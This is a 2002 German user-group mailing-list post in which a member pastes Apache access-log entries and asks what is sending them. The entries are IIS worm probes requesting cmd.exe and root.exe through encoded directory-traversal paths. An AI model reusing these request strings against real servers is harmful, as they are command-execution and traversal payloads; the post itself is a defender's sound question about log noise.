Hier ein paar Zeilen die mir so ein bischen die Nackenhaare zu berge stellen. Ist das ein Freeware Programm das diese Anfragen sendet? Diesen Schmodder finde ich fast t�glich in meiner access.log von Apache.
Kann nur sagen, ich freue micht riesig auf das Firewall-Seminar. Gru� Ernst 80.133.80.218 - - [29/Jul/2002:19:55:15 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 288 "-" "-" 80.133.80.218 - - [29/Jul/2002:19:55:15 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 286 "-" "-" 80.133.80.218 - - [29/Jul/2002:19:55:15 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 296 "-" "-" 80.133.80.218 - - [29/Jul/2002:19:55:16 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 296 "-" "-" 80.133.80.218 - - [29/Jul/2002:19:55:16 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310 "-" "-" 80.133.80.218 - - [29/Jul/2002:19:55:16 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 327 "-" "-" 80.133.80.218 - - [29/Jul/2002:19:55:17 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 327 "-" "-" 80.133.80.218 - - [29/Jul/2002:19:55:17 +0200] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir ---------------------------------------------------------------------------- PUG - Penguin User Group Wiesbaden - http://www.pug.org
